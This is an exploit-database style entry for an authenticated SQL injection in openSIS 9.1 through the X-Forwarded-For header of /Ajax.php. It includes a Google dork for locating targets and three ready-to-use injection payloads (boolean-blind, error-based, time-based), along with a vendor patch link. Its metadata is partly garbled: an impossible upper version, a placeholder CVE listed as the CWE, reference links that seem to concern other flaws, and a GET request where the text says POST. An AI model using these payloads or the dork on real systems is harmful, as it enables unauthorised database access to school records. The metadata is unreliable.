openSIS 9.1 - SQL Injection (Authenticated)

vendor:

Open Source Information System Community

by:

Devrim Dıragumandan (d0ub1edd)

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Open Source Information System Community

Affected Version From: 9.1

Affected Version To: 45300

Patch Exists: YES

Related CWE: CVE-2024-XXXX (example)

CPE: a:os4ed:opensis:9.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2024-42077/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2024-42077/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=18405, https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

Platforms Tested: Linux

2024

openSIS 9.1 – SQL Injection (Authenticated)

A SQL injection vulnerability was discovered in OS4Ed Open Source Information System Community version 9.1. By manipulating the 'X-Forwarded-For' header parameters in a POST request to /Ajax.php, an attacker can execute malicious SQL queries.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the fix provided by the vendor at https://github.com/OS4ED/openSIS-Classic/pull/322. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. 

GET /Ajax.php?modname=x HTTP/1.1

---
    Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
--- 

FIX: https://github.com/OS4ED/openSIS-Classic/pull/322